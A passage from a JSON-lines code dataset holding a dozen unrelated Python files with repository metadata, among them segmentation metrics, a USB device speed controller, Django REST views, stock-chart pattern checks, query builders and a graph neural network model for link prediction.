cartelle\nfile_cartella1 = os.listdir(cartella1)\nfile_cartella2 = os.listdir(cartella2)\n\n# Verifica che le due cartelle abbiano lo stesso numero di file\nif len(file_cartella1) != len(file_cartella2):\n print(\"Le cartelle non contengono lo stesso numero di file.\")\n exit()\n\n# Cicla tra i file delle due cartelle in parallelo\nfor file1, file2 in zip(file_cartella1, file_cartella2):\n i+=1\n percorso_file1 = os.path.join(cartella1, file1)\n percorso_file2 = os.path.join(cartella2, file2)\n\n maschera1 = cv2.imread(percorso_file1, cv2.IMREAD_GRAYSCALE)\n maschera2 = cv2.imread(percorso_file2, cv2.IMREAD_GRAYSCALE)\n\n # Verifica se le maschere sono state caricate correttamente\n if maschera1 is None or maschera2 is None:\n print(\"Impossibile caricare le maschere.\")\n exit()\n\n # Converti le maschere in array di booleani\n maschera1 = maschera1.astype(bool)\n maschera2 = maschera2.astype(bool)\n\n veri_positivi += np.sum(np.logical_and(maschera1, maschera2))\n falsi_positivi += np.sum(np.logical_and(maschera1, ~maschera2))\n veri_negativi += np.sum(np.logical_and(~maschera1, ~maschera2))\n falsi_negativi += np.sum(np.logical_and(~maschera1, maschera2))\n\n# Stampa i risultati\nprint(\"Veri positivi:\", veri_positivi)\nprint(\"Falsi positivi:\", falsi_positivi)\nprint(\"Veri negativi:\", veri_negativi)\nprint(\"Falsi negativi:\", falsi_negativi)\n\nprecision, recall, f1_score, accuracy = calcola_metriche(veri_positivi, falsi_positivi, falsi_negativi, veri_negativi)\n\n# Stampa i risultati\nprint(\"Precision:\", precision)\nprint(\"Recall:\", recall)\nprint(\"F1-score:\", f1_score)\nprint(\"Accuracy:\", accuracy)\nprint(\"Immagini analizzate:\", i)","repo_name":"sakab01/mask","sub_path":"segmentation_score.py","file_name":"segmentation_score.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"9998850119","text":"#!/usr/bin/env python2.6\nimport sys\nimport os\nos.environ[\"DYLD_LIBRARY_PATH\"] = \"/Users/qdot/git-projects/library/usr_darwin_10.5_x86/lib/\"\nsys.path.append('/Users/qdot/git-projects/library/usr_darwin_10.5_x86/lib/python2.6/site-packages')\nimport usb\nimport time\nfrom contextlib import *\n\nclass TranceVibrator():\n #Device as retreived from the bus listing\n trancevibe_device = None\n #Handle to access the device with\n trancevibe_handle = None\n\n TRANCEVIBE_VENDOR_ID = 0x0b49\n TRANCEVIBE_PRODUCT_ID = 0x064f\n\n #Constructor\n def __init__(self):\n return\n\n @classmethod\n def create(cls, index = 0):\n t = TranceVibrator()\n t.open(index)\n return t\n\n def open(self, index = 0):\n \"\"\" Given an index, opens the related ambx device. The index refers\n to the position of the device on the USB bus. Index 0 is default, \n and will open the first device found.\n\n Returns True if open successful, False otherwise.\n \"\"\"\n self.trancevibe_device = usb.core.find(idVendor = self.TRANCEVIBE_VENDOR_ID, \n idProduct = self.TRANCEVIBE_PRODUCT_ID)\n if self.trancevibe_device is None:\n return False\n return True\n \n @contextmanager\n def close(self):\n \"\"\"Closes the trancevibe device currently held by the object, \n if it is open.\"\"\"\n if self.trancevibe_device is not None:\n self.trancevibe_device = None\n\n def set_speed(self, speed):\n self.trancevibe_device.ctrl_transfer(\n usb.ENDPOINT_OUT | usb.TYPE_VENDOR | usb.RECIP_INTERFACE,\n 1,\n speed,\n 0,\n []\n )\n\ndef main(argv=None):\n with closing(TranceVibrator.create()) as tv:\n tv.set_speed(255)\n time.sleep(0.5)\n tv.set_speed(0)\n \nif __name__ == \"__main__\":\n \n sys.exit(main())\n\n","repo_name":"qdot/deldo","sub_path":"trancevibe.py","file_name":"trancevibe.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":185,"dataset":"github-code","pt":"67"} +{"seq_id":"42954973483","text":"def build_encoder(config, drop_path_allocator,\n dim, num_heads, mlp_ratio, qkv_bias, drop_rate, attn_drop_rate,\n z_shape, x_shape):\n encoder_config = config['transformer']['encoder']\n encoder_type = encoder_config['type']\n\n if encoder_type == 'concatenation_feature_fusion':\n from .concatenated_fusion.builder import build_concatenated_fusion_encoder\n return build_concatenated_fusion_encoder(config, drop_path_allocator,\n dim, num_heads, mlp_ratio, qkv_bias, drop_rate, attn_drop_rate,\n z_shape, x_shape)\n elif encoder_type == 'cross_attention_feature_fusion':\n from .cross_attention_fusion.builder import build_cross_attention_based_encoder\n return build_cross_attention_based_encoder(config, drop_path_allocator,\n dim, num_heads, mlp_ratio, qkv_bias, drop_rate, attn_drop_rate,\n z_shape, x_shape)\n else:\n raise NotImplementedError(encoder_type)\n","repo_name":"LitingLin/SwinTrack","sub_path":"models/methods/SwinTrack/modules/encoder/builder.py","file_name":"builder.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":224,"dataset":"github-code","pt":"67"} +{"seq_id":"16451320697","text":"from ntpath import join\r\nfrom colors import *\r\nclass Picture:\r\n def __init__(self, img):\r\n self.img = img;\r\n\r\n def __eq__(self, other):\r\n return self.img == other.img\r\n\r\n def _invColor(self, color):\r\n if color not in inverter:\r\n return color\r\n return inverter[color]\r\n\r\n def verticalMirror(self):\r\n \"\"\" Devuelve el espejo vertical de la imagen \"\"\"\r\n new = []\r\n num = len(self.img) - 1\r\n while (num >= 0):\r\n new.append(self.img[num])\r\n num = num - 1\r\n return new\r\n\r\n def horizontalMirror(self):\r\n \"\"\" Devuelve el espejo horizontal de la imagen \"\"\"\r\n new = []\r\n num = 0\r\n for x in self.img:\r\n str = self.img[num]\r\n reversed = []\r\n i = len(str)\r\n while i > 0: \r\n reversed += str[i-1]\r\n i = i - 1\r\n num = num + 1\r\n str = \"\".join(reversed)\r\n new.append(str)\r\n return new\r\n\r\n def negative(self):\r\n \"\"\" Devuelve un negativo de la imagen \"\"\"\r\n return Picture(None)\r\n\r\n def join(self, p):\r\n \"\"\" Devuelve una nueva figura poniendo la figura del argumento \r\n al lado derecho de la figura actual \"\"\"\r\n new = []\r\n num = 0\r\n for x in self.img:\r\n new.append(self.img[num])\r\n new[num] = new[num] + p.img[num] \r\n num = num + 1\r\n return new\r\n\r\n def up(self, p):\r\n \"\"\" Devuelve una nueva figura poniendo la figura p debajo de la\r\n figura actual \"\"\"\r\n return Picture(None)\r\n\r\n def under(self, p):\r\n \"\"\" Devuelve una nueva figura poniendo la figura p sobre la\r\n figura actual \"\"\"\r\n return Picture(None)\r\n \r\n def horizontalRepeat(self, n):\r\n \"\"\" Devuelve una nueva figura repitiendo la figura actual al costado\r\n la cantidad de veces que indique el valor de n \"\"\"\r\n new = []\r\n num = 0\r\n for x in self.img:\r\n new.append(self.img[num])\r\n iter = 0\r\n while(iter < n-1):\r\n new[num] = new[num] + self.img[num] \r\n iter = iter +1\r\n num = num + 1\r\n return new\r\n\r\n def verticalRepeat(self, n):\r\n \"\"\" Devuelve una nueva figura repitiendo la figura actual por debajo de\r\n la cantidad de veces que indique el valor de n \"\"\"\r\n new = []\r\n iter = 0\r\n while(iter < n):\r\n num = 0\r\n for x in self.img:\r\n new.append(self.img[num])\r\n num = num + 1\r\n iter = iter + 1\r\n return new\r\n\r\n #Extra: Sólo para realmente viciosos \r\n def rotate(self):\r\n \"\"\"Devuelve una figura rotada en 90 grados, puede ser en sentido horario\r\n o antihorario\"\"\"\r\n return Picture(None)\r\n\r\n","repo_name":"JRodriguezOc/lab04","sub_path":"lab/chess_work/picture.py","file_name":"picture.py","file_ext":"py","file_size_in_byte":2524,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"1838721667","text":"import requests\n\nfrom environs import Env\n\nenv = Env()\n\n\ndef send_help_message(sender_id, message):\n params = {'access_token': env('PAGE_ACCESS_TOKEN')}\n headers = {'Content-Type': 'application/json'}\n text = f'Невозможно распознать команду {message}. Для начала нажмите старт'\n request_content = {\n 'recipient': {\n 'id': sender_id\n },\n 'message': {\n 'attachment': {\n 'type': 'template',\n 'payload': {\n 'template_type': 'button',\n 'text': text,\n 'buttons': [{ \n 'type': 'postback', \n 'title': 'start', \n 'payload': '/start'\n }] \n }\n }\n }\n }\n url = 'https://graph.facebook.com/v2.6/me/messages'\n response = requests.post(url, params=params, headers=headers, json=request_content)\n response.raise_for_status()","repo_name":"HkerVit/pizza-bot","sub_path":"fb_help_message.py","file_name":"fb_help_message.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"3293726458","text":"\n'''\n 单根K线构成的形态的检测器\n'''\n'''\n # 锤子线\n # 流星形态\n'''\nclass SingleKLineFormChecker(object):\n __instance = None\n def __new__(cls, *args, **kwargs):\n if not cls.__instance:\n cls.__instance = super().__new__(cls, *args, **kwargs)\n return cls.__instance\n\n # 锤子线\n def hammerWire(self, day:list):\n open, high, close, low = day[0:4]\n entity_len = abs(open - close) # K线实体\n upper_shadow_len = high - open if open > close else high - close\n lower_shadow_len = open - low if open < close else close - low\n '''\n - 长下影线\n - 无上影线\n '''\n if lower_shadow_len > 2 * entity_len and upper_shadow_len == 0: # 严格没有上影线\n if open > close:\n return 0x000 # 顶部绿锤子线\n elif open < close:\n return 0x001 # 底部红锤子线\n return -1\n\n # 流星形态\n ## 流星形态的高位看跌比低位看涨要强烈!!!\n def meteorForm(self, day:list):\n open, high, close, low = day[0:4]\n entity_len = abs(open - close) # K线实体\n lower_shadow_len = open - low if open < close else close - low\n '''\n - 实体较小\n - 长上影线\n - 颜色不重要\n '''\n if (abs(high - open) > 2 * entity_len or abs(high - close) > 2 * entity_len) \\\n and lower_shadow_len == 0: # 严格没有下影线\n return 0x002\n return -1\n\n # 倒锤子形态\n def invertedHammerWire(self, day: list):\n open, high, close, low = day[0:4]\n entity_len = abs(open - close) # K线实体\n lower_shadow_len = open - low if open < close else close - low\n max_v = max(open, close)\n '''\n - 实体较小\n - 长上影线\n - 颜色不重要\n - 第二天是一根阳线,并且阳线 开盘价 >= 第一天实体的最大值\n '''\n if abs(high - max_v) >= entity_len \\\n and lower_shadow_len == 0: # 严格无下影线\n return 0x104\n return -1\n\nif __name__ == '__main__':\n import pandas as pd\n from src.analysis_department.StockForms import StockForms\n\n stockMap = {\n \"000524\": \"岭南控股\",\n \"002108\": \"沧州明珠\",\n \"002138\": \"顺络电子\",\n \"002625\": \"光启技术\",\n \"603703\": \"盛洋科技\",\n \"600988\": \"赤峰黄金\",\n \"000503\": \"国新健康\",\n \"300316\": \"晶盛机电\",\n \"300376\": \"易事特\",\n \"300424\": \"航新科技\",\n \"300494\": \"盛天网络\"\n }\n\n for id in stockMap.keys():\n df = pd.read_excel('../../datas/股票数据/' + id + stockMap[id] + '.xlsx', sheet_name='历史日K数据', parse_dates=True)\n print('-----------------------------: ' + id + stockMap[id])\n\n for i in range(0, len(df)):\n line_lst = list(df.iloc[i])\n date, open, high, close, low = line_lst[0:5]\n day = [open, high, close, low]\n res = SingleKLineFormChecker().hammerWire(day)\n if res != -1:\n print(\"====>: \" + date + \": \" + StockForms().get(res), end=\"\")\n print('===========================================\\n')","repo_name":"woaijssss/stock_analysis","sub_path":"technology/src/stock_forms/SingleKLineFormChecker.py","file_name":"SingleKLineFormChecker.py","file_ext":"py","file_size_in_byte":3337,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"67"} +{"seq_id":"21497785054","text":"\r\nfrom rest_framework.decorators import api_view, permission_classes, authentication_classes\r\nfrom rest_framework.permissions import IsAuthenticated\r\nfrom rest_framework.response import Response\r\nfrom rest_framework import status\r\n\r\nfrom ..serializers import CompanySerializer, CompanySerializer2, VacancySerializer, VacancySerializer2\r\nfrom ..models import Company, Vacancy\r\n\r\n\r\n@api_view(['GET', 'POST'])\r\n@permission_classes([IsAuthenticated])\r\ndef all_companies(request):\r\n if request.method == 'GET':\r\n companies = Company.objects.all() # [ companies - это QuerySet ]\r\n serializer = CompanySerializer(companies, many=True)\r\n return Response(serializer.data)\r\n\r\n elif request.method == 'POST':\r\n serializer = CompanySerializer(data=request.data)\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response(serializer.data, status=status.HTTP_201_CREATED)\r\n return Response(serializer.errors, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\r\n\r\n\r\n@api_view(['GET', 'PUT', 'DELETE'])\r\n@permission_classes([IsAuthenticated])\r\ndef one_company(request, company_id):\r\n try:\r\n company = Company.objects.get(id=company_id)\r\n except Company.DoesNotExist as e:\r\n return Response({'error': str(e)})\r\n\r\n if request.method == 'GET':\r\n serializer = CompanySerializer(company)\r\n return Response(serializer.data)\r\n\r\n elif request.method == 'PUT':\r\n serializer = CompanySerializer(instance=company, data=request.data)\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response(serializer.data)\r\n return Response({'error': serializer.errors})\r\n\r\n elif request.method == 'DELETE':\r\n company.delete()\r\n return Response({'Deleted': True})\r\n\r\n\r\n@api_view(['GET'])\r\n@permission_classes([IsAuthenticated])\r\ndef all_vacancies_by_company(request, company_id):\r\n if request.method == 'GET':\r\n try:\r\n company = Company.objects.get(id=company_id)\r\n except Company.DoesNotExist as e:\r\n return Response({'error': 'company does not exists []'})\r\n\r\n vacancies = company.vacancy_set.all()\r\n\r\n if vacancies.__len__() == 0:\r\n return Response({'info': 'qazir bul [company] boyinsha [vacancies] JO-O-O-Q'})\r\n else:\r\n serializer = VacancySerializer2(vacancies, many=True)\r\n return Response(serializer.data)\r\n\r\n\r\n@api_view(['GET', 'POST'])\r\n@permission_classes([IsAuthenticated])\r\ndef all_vacancies(request):\r\n if request.method == 'GET':\r\n vacancies = Vacancy.objects.all()\r\n serializer = VacancySerializer2(vacancies, many=True)\r\n return Response(serializer.data)\r\n\r\n elif request.method == 'POST':\r\n serializer = VacancySerializer2(data=request.data)\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response(serializer.data, status=status.HTTP_201_CREATED)\r\n return Response({'error': serializer.errors}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\r\n\r\n\r\n@api_view(['GET', 'PUT', 'DELETE'])\r\n@permission_classes([IsAuthenticated])\r\ndef one_vacancy(request, vacancy_id):\r\n try:\r\n vacancy = Vacancy.objects.get(id=vacancy_id)\r\n except Vacancy.DoesNotExist as e:\r\n return Response({'error': 'vacancy does not exists'})\r\n\r\n if request.method == 'GET':\r\n serializer = VacancySerializer2(vacancy)\r\n return Response(serializer.data)\r\n\r\n elif request.method == 'PUT':\r\n serializer = VacancySerializer2(instance=vacancy, data=request.data)\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response(serializer.data)\r\n return Response({'error': serializer.errors})\r\n\r\n elif request.method == 'DELETE':\r\n vacancy.delete()\r\n return Response({'Deleted': True})\r\n\r\n\r\n@api_view(['GET'])\r\ndef top_ten_vacancies(request):\r\n if request.method == 'GET':\r\n top_vacancies = Vacancy.objects.order_by('-salary')[0:10]\r\n serializer = VacancySerializer2(top_vacancies, many=True)\r\n return Response(serializer.data)\r\n","repo_name":"Pazyl/WED101","sub_path":"lab10/demo/api/views/views_fbv.py","file_name":"views_fbv.py","file_ext":"py","file_size_in_byte":4168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13243667998","text":"\"\"\" Simple script for generating TRAPI query samples.\n\"\"\"\n\nimport json\n\nfrom chp_client.query import build_query\n\n\ndef make_standard_probablistic_query_one_gene():\n \"\"\" Build a standard probablistic query with one gene and one drug.\n \"\"\"\n query = build_query(\n genes=[\"ENSEMBL:ENSG00000141510\"],\n therapeutic=\"CHEMBL:CHEMBL88\",\n disease=\"MONDO:0007254\",\n outcome=(\"EFO:0000714\", \">=\", 500)\n )\n \n with open('standard_one_gene.json', 'w') as f_:\n json.dump(query, f_) \n\ndef make_standard_probablistic_query_two_gene():\n \"\"\" Build a standard probablistic query with two genes and one drug.\n \"\"\"\n query = build_query(\n genes=[\"ENSEMBL:ENSG00000121879\", \"ENSEMBL:ENSG00000155657\"],\n therapeutic=\"CHEMBL:CHEMBL88\",\n disease=\"MONDO:0007254\",\n outcome=(\"EFO:0000714\", \">=\", 500)\n )\n \n with open('standard_two_gene.json', 'w') as f_:\n json.dump(query, f_) \n\ndef make_gene_wildcard_query():\n \"\"\" Builds a gene wildcard query\n \"\"\"\n query = build_query(\n therapeutic=\"CHEMBL:CHEMBL88\",\n disease=\"MONDO:0007254\",\n outcome=(\"EFO:0000714\", \">=\", 500),\n num_gene_wildcards=1,\n )\n\n with open('gene_wildcard.json', 'w') as f_:\n json.dump(query, f_) \n\ndef make_drug_wildcard_query():\n for i in [1,2,5,10]:\n query = build_query(\n genes=[\"ENSEMBL:ENSG00000012048\"],\n disease=\"MONDO:0007254\",\n outcome=(\"EFO:0000714\", \">=\", 365*i),\n therapeutic_wildcard=True,\n )\n\n with open('dw_brac1_{}yr.json'.format(i), 'w') as f_:\n json.dump(query, f_)\n\ndef make_one_hop_query():\n query = build_query(\n genes=[\"ENSEMBL:ENSG00000121879\"],\n therapeutic_wildcard=True,\n one_hop=True,\n )\n\n with open('one_hop.json', 'w') as f_:\n json.dump(query, f_)\n\ndef main():\n #make_standard_probablistic_query_one_gene()\n #make_standard_probablistic_query_two_gene()\n #make_gene_wildcard_query()\n make_drug_wildcard_query()\n #make_one_hop_query()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"di2ag/chp_client","sub_path":"samples/generate_samples.py","file_name":"generate_samples.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"42674067606","text":"\"\"\"\n@author: grapesh@gmail.com\n\"\"\"\n\nimport os, csv, shutil, glob\nimport tarfile\nimport numpy as np\nfrom datetime import datetime\nfrom csdllib import oper\n\n#==============================================================================\ndef findLatestCycle (dirMask):\n \n dirs = glob.glob(dirMask+'*')\n latestDir = max(dirs, key=os.path.getctime) \n D = os.path.basename(latestDir).split('.')[-1]\n\n files = glob.glob(latestDir + '/*.csv_tar')\n latestFile = max(files)\n\n F = os.path.basename(latestFile)\n latestCycle = D + F[F.find('.t')+2:F.find('z.')]\n\n return latestCycle\n \n#==============================================================================\ndef readStations (tarFile, verbose=1):\n \"\"\"\n Reads content of tar file into the list of stations\n \"\"\" \n if verbose:\n oper.sys.msg('i', 'Reading ' + tarFile)\n if not os.path.exists (tarFile):\n oper.sys.msg('e', 'File ' + tarFile + ' is not found. Exiting.')\n return\n \n stations = []\n tar = tarfile.open(tarFile, \"r:*\")\n tmpDir = os.path.join(os.getcwd(),'tmp')\n try:\n shutil.rmtree(tmpDir)\n except:\n pass \n os.mkdir(tmpDir)\n for member in tar.getmembers():\n if member.isreg(): # skip if the TarInfo is not files\n member.name = os.path.basename(member.name)\n tar.extract(member, tmpDir) # extract\n stations.append( readStation( os.path.join(tmpDir, member.name)) )\n tar.close()\n shutil.rmtree(tmpDir)\n \n return stations\n\n#==============================================================================\ndef readStation (csvFile, verbose=1):\n \"\"\"\n Reads one station data from csvFile\n Returns lists of dates and corresponding time series values\n Skips obs\n \"\"\"\n if verbose:\n oper.sys.msg( 'i','Reading ' + csvFile)\n if not os.path.exists (csvFile):\n oper.sys.msg( 'e','File ' + csvFile + ' is not found. Exiting.')\n return\n\n nosid = os.path.splitext(os.path.basename(csvFile))[0]\n missingVal = 9999.\n dtime = []\n tide = []\n surge = []\n bias = []\n twl = []\n with open( csvFile ) as csvfile:\n data = csv.reader(csvfile, delimiter=',')\n next(data, None)\n\n for row in data:\n row = [np.nan if float(x) == missingVal else x for x in row]\n TIME, TIDE, OB, SURGE, BIAS, TWL = row\n if TWL is np.nan:\n pass\n else:\n dtime.append ( datetime.strptime(TIME,'%Y%m%d%H%M') )\n tide.append ( float (TIDE) )\n surge.append ( float(SURGE) )\n bias.append ( float(BIAS) )\n twl.append ( float(TWL) )\n \n return {'time' : dtime, \n 'htp' : tide,\n 'swl' : surge,\n 'cwl' : twl,\n 'bias' : bias,\n 'nosid' : nosid} \n\n ","repo_name":"grapesh/csdllib","sub_path":"csdllib/models/etss.py","file_name":"etss.py","file_ext":"py","file_size_in_byte":2967,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"31669089310","text":"import cv2\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\nlsy = cv2.imread(\"D:\\Work\\Image_Processing\\Blog\\py_code\\lee-sung-kyung.jpg\",0)\r\n\r\nplt.subplot(1,4,1),plt.imshow(lsy,cmap = 'gray')\r\nplt.title('original'), plt.xticks([]), plt.yticks([])\r\n\r\nkernel3 = np.ones((3,3),np.float32)/9.0\r\nblur3 = cv2.filter2D(lsy,-1,kernel3)\r\nplt.subplot(1,4,2),plt.imshow(blur3,cmap = 'gray')\r\nplt.title('3x3'), plt.xticks([]), plt.yticks([])\r\n\r\nkernel5 = np.ones((5,5),np.float32)/25.0\r\nblur5 = cv2.filter2D(lsy,-1,kernel5)\r\nplt.subplot(1,4,3),plt.imshow(blur5,cmap = 'gray')\r\nplt.title('5x5'), plt.xticks([]), plt.yticks([])\r\n\r\nkernel7 = np.ones((7,7),np.float32)/49.0\r\nblur7 = cv2.filter2D(lsy,-1,kernel7)\r\nplt.subplot(1,4,4),plt.imshow(blur7,cmap = 'gray')\r\nplt.title('7x7'), plt.xticks([]), plt.yticks([])\r\n\r\nplt.show()","repo_name":"PisitpongW/ImageProcessing","sub_path":"Filter/box.py","file_name":"box.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"28082576725","text":"from typing import List\n\ndef contains(item, packages: List[str]):\n for package in packages:\n if not package.__contains__(item):\n return False\n return True\n\ndef find_shared(packages: List[str]):\n assert len(packages) >= 2, \"Must be 2 or more packages\"\n for item in packages[0]:\n if contains(item, packages[1:]):\n return item\n\ndef get_priority(item: str):\n if(item >= \"a\" and item <= \"z\"):\n return ord(item) - 96\n if (item >= \"A\" and item <= \"Z\"):\n return ord(item) - 38\n else:\n assert False, \"Unknown item\"\n\npriorities_part_1 = 0\npriorities_part_2 = 0\nwith open('input.txt') as file:\n group = []\n for rucksack in file.readlines():\n rucksack = rucksack.strip()\n\n # Part 1\n first = rucksack[:int(len(rucksack)/2)]\n second = rucksack[-int(len(rucksack)/2):]\n shared = find_shared([first, second])\n priorities_part_1 += get_priority(shared)\n\n # Part 2\n group.append(rucksack)\n\n if len(group) >= 3:\n shared = find_shared(group)\n priorities_part_2 += get_priority(shared)\n group = []\n\nprint(priorities_part_1)\nprint(priorities_part_2)\n","repo_name":"poschi3/AdventOfCode2022","sub_path":"day03/day03.py","file_name":"day03.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"8560980492","text":"from copy import Error\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nfrom torch.nn import Linear, Dropout\r\n\r\nfrom torch_geometric.nn import SAGEConv, Linear, to_hetero, GATv2Conv\r\nfrom torch.nn import Linear, ReLU, BatchNorm1d\r\nfrom torchmetrics import R2Score\r\n\r\nfrom src.utils import get_sample_weights, correct_negative_edges\r\nfrom src.loss import RBOLoss, pearson_correlation_coefficient, penalize_false_negative, weighted_mean_absolute_error_loss, weighted_mse_loss, weighted_rmse\r\nfrom src.data import get_missing_links, get_singular_edge_indices\r\n\r\n\r\nclass SAGEEncoder(torch.nn.Module):\r\n\tdef __init__(self, hidden_channels, out_channels, num_layers, final_activation, with_linears, in_channels=-1):\r\n\t\tsuper().__init__()\r\n\t\tself.final_activation = final_activation\r\n\r\n\t\tself.convs = torch.nn.ModuleList()\r\n\t\tfor _ in range(num_layers-1):\r\n\t\t\tself.convs.append(SAGEConv((-1, -1), hidden_channels, project=with_linears))\r\n\r\n\t\tself.lastconv = SAGEConv((-1, -1), out_channels, project=with_linears)\r\n\r\n\r\n\tdef forward(self, x, edge_index, edge_attr):\r\n\t\tfor conv in self.convs:\r\n\t\t\tx = conv(x, edge_index)\r\n\t\t\tx = x.relu()\r\n\t\tx = self.lastconv(x, edge_index)\r\n\t\t\r\n\t\tif self.final_activation:\r\n\t\t\tx = x.relu()\r\n\r\n\t\treturn x\r\n\r\n\r\nclass GATEncoder(torch.nn.Module):\r\n\tdef __init__(self, hidden_channels, out_channels, num_layers, final_activation, with_linears, in_channels=-1):\r\n\t\tsuper().__init__()\r\n\t\tself.with_linears = with_linears\r\n\t\tself.final_activation = final_activation\r\n\r\n\t\tself.convs = torch.nn.ModuleList()\r\n\t\tfor _ in range(num_layers-1):\r\n\t\t\t# self.convs.append(GATv2Conv((-1, -1), hidden_channels, add_self_loops=False, edge_dim=1, heads=2, concat=False, dropout=0.2))\r\n\t\t\tself.convs.append(GATv2Conv((-1, -1), hidden_channels, edge_dim=1, add_self_loops=False))\r\n\r\n\t\t# self.lastconv = GATv2Conv((-1, -1), out_channels, add_self_loops=False, edge_dim=1, heads=2, concat=False, dropout=0.2)\r\n\t\tself.lastconv = GATv2Conv((-1, -1), out_channels, edge_dim=1, add_self_loops=False)\r\n\r\n\tdef forward(self, x, edge_index, edge_attr):\r\n\t\tfor conv in self.convs:\r\n\t\t\tx = conv(x, edge_index, edge_attr)\r\n\t\t\tx = x.relu()\r\n\t\tx = self.lastconv(x, edge_index, edge_attr)\r\n\t\t\r\n\t\tif self.final_activation:\r\n\t\t\tx = x.relu()\r\n\t\treturn x\r\n\r\n\r\nclass EdgeDecoder(torch.nn.Module):\r\n\tdef __init__(self, hidden_channels, link_type, final_activation, use_dropout=False, use_batchnorm=False):\r\n\t\tsuper().__init__()\r\n\t\tself.use_dropout = use_dropout\r\n\t\tself.use_batchnorm = use_batchnorm\r\n\r\n\t\tself.lin1 = Linear(2 * hidden_channels, hidden_channels)\r\n\t\tif use_batchnorm:\r\n\t\t\tself.batchnorm1 = BatchNorm1d(hidden_channels)\r\n\t\tif use_dropout:\r\n\t\t\tself.dropout1 = Dropout(0.2)\r\n\t\tself.lin2 = Linear(hidden_channels, 1)\r\n\r\n\t\tself.link_from = link_type[0]\r\n\t\tself.link_to = link_type[1]\r\n\t\tself.final_activation = final_activation\r\n\r\n\tdef forward(self, z_dict, edge_label_index):\r\n\t\trow, col = edge_label_index\r\n\t\tz = torch.cat([z_dict[self.link_from][row], z_dict[self.link_to][col]], dim=-1)\r\n\r\n\t\tz = self.lin1(z)\r\n\t\tif self.use_batchnorm:\r\n\t\t\tz = self.batchnorm1(z)\r\n\t\tz = z.relu()\r\n\t\tif self.use_dropout:\r\n\t\t\tz = self.dropout1(z)\r\n\t\tz = self.lin2(z).relu()\r\n\t\treturn z\r\n\r\n\r\nclass Model(torch.nn.Module):\r\n\tdef __init__(self, hidden_channels, data, metadata, link_type, loss_function='cross_entropy', encoder='sage', num_encoding_layers=2, aggregation_operator='mean', final_activation=True, with_linears=False, use_dropout=False):\r\n\t\tsuper().__init__()\r\n\t\tself.encoder_type = encoder\r\n\t\tif encoder == 'sage':\r\n\t\t\tself.encoder = SAGEEncoder(hidden_channels, hidden_channels, num_layers=num_encoding_layers, final_activation=final_activation, with_linears=with_linears)\r\n\t\t\tself.encoder = to_hetero(self.encoder, metadata, aggr=aggregation_operator)\r\n\t\telif encoder == 'gat':\r\n\t\t\tself.encoder = GATEncoder(hidden_channels, hidden_channels, num_layers=num_encoding_layers, final_activation=final_activation, with_linears=with_linears)\r\n\t\t\tself.encoder = to_hetero(self.encoder, metadata, aggr=aggregation_operator)\r\n\t\telse:\r\n\t\t\traise Error(\"Encoder type {} not implemented!\".format(encoder))\r\n\t\tself.decoder = EdgeDecoder(hidden_channels, link_type=link_type, final_activation=final_activation, use_dropout=use_dropout)\r\n\t\tself.loss_function = loss_function\r\n\t\tself.link_from = link_type[0]\r\n\t\tself.link_to = link_type[1]\r\n\r\n\tdef load(self, path):\r\n\t\tself.load_state_dict(torch.load(path))\r\n\t\tself.eval()\r\n\t\treturn self\r\n\t\r\n\tdef save(self, path):\r\n\t\ttorch.save(self.state_dict(), path)\r\n\r\n\tdef forward(self, x_dict, edge_index_dict, edge_label_index, edge_attr_dict):\r\n\t\tz_dict = self.encoder(x_dict, edge_index_dict, edge_attr_dict)\r\n\t\treturn self.decoder(z_dict, edge_label_index)\r\n\t\r\n\tdef inspect(self, data, mode='all'):\r\n\t\tedge_type = (self.link_from, self.link_to)\r\n\t\tif mode == 'train':\r\n\t\t\treturn data[edge_type].y_edge_index[:, data[edge_type].train_idx]\r\n\t\telif mode == 'val':\r\n\t\t\treturn data[edge_type].y_edge_index[:, data[edge_type].val_idx]\r\n\t\telif mode == 'test':\r\n\t\t\treturn data[edge_type].y_edge_index[:, data[edge_type].test_idx]\r\n\t\telif mode == 'all':\r\n\t\t\treturn data[edge_type].y_edge_index\r\n\t\telif mode == 'singular':\r\n\t\t\treturn data[edge_type].y_edge_index[:, get_singular_edge_indices(data, edge_type)]\r\n\t\telif mode == 'missing':\r\n\t\t\treturn get_missing_links(data, edge_type)\r\n\t\telse:\r\n\t\t\traise ValueError(\"GNN inspect(): mode can only be 'train', 'val', 'test' or 'all'\")\r\n\r\n\tdef ground_truth(self, data, mode='all'):\r\n\t\tedge_type = (self.link_from, self.link_to)\r\n\t\tif mode == 'train':\r\n\t\t\treturn data[edge_type].y[data[edge_type].train_idx]\r\n\t\telif mode == 'val':\r\n\t\t\treturn data[edge_type].y[data[edge_type].val_idx]\r\n\t\telif mode == 'test':\r\n\t\t\treturn data[edge_type].y[data[edge_type].test_idx]\r\n\t\telif mode == 